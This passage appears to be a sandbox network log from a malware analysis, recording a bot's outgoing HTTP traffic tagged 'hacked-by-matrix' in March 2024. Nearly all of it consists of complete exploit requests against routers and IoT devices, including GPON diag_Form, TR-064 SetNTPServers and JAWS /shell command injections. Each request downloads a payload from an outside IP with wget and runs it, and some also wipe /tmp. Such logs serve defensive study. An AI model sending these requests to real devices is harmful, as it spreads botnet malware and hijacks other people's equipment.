                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2051192.168.2.13472125.217.61.49443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877691984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2052192.168.2.133514842.143.0.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877717018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2053192.168.2.133583642.133.55.115443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877739906 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2054192.168.2.1355434212.94.113.160443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877743006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2055192.168.2.1360870118.28.217.118443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:43.877804995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2056192.168.2.1353382196.210.41.927547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.068886995 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:44.440284967 CET174INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Date: Thu, 21 Mar 2024 04:28:17 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2057192.168.2.1335290101.108.186.1237547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.098406076 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2058192.168.2.134057494.181.90.1357547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.201580048 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:44.440238953 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 08:23:43 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2059192.168.2.135594223.200.250.15180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.204936028 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:44.306888103 CET534INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 312
                                                        Expires: Thu, 21 Mar 2024 04:23:44 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:44 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 31 64 33 33 33 32 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 34 26 23 34 36 3b 30 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 37 26 23 34 36 3b 31 64 33 33 33 32 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 34 26 23 34 36 3b 30 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;1d333217&#46;1710995024&#46;0<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;7&#46;1d333217&#46;1710995024&#46;0</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2060192.168.2.135047234.98.71.5280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.294624090 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2061192.168.2.133854866.66.29.1397547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.324703932 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2062192.168.2.1353518196.210.41.927547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.405672073 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.420260906 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.787071943 CET174INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Date: Thu, 21 Mar 2024 04:28:18 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2063192.168.2.133856066.66.29.1397547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.445077896 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2064192.168.2.1359820152.254.159.2177547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.546947002 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.228844881 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2065192.168.2.1349178183.123.17.1607547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.623650074 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:46.124243975 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:46.412811041 CET97INHTTP/1.1 401 Unauthorized
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Content-length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2066192.168.2.135043834.98.71.5280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.903619051 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2067192.168.2.1348030129.213.171.19180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.972105026 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2068192.168.2.1358428172.172.57.23680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:44.975059032 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:45.079374075 CET450INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2069192.168.2.135896299.241.252.2147547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.125943899 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2070192.168.2.133718638.109.254.817547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.154925108 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
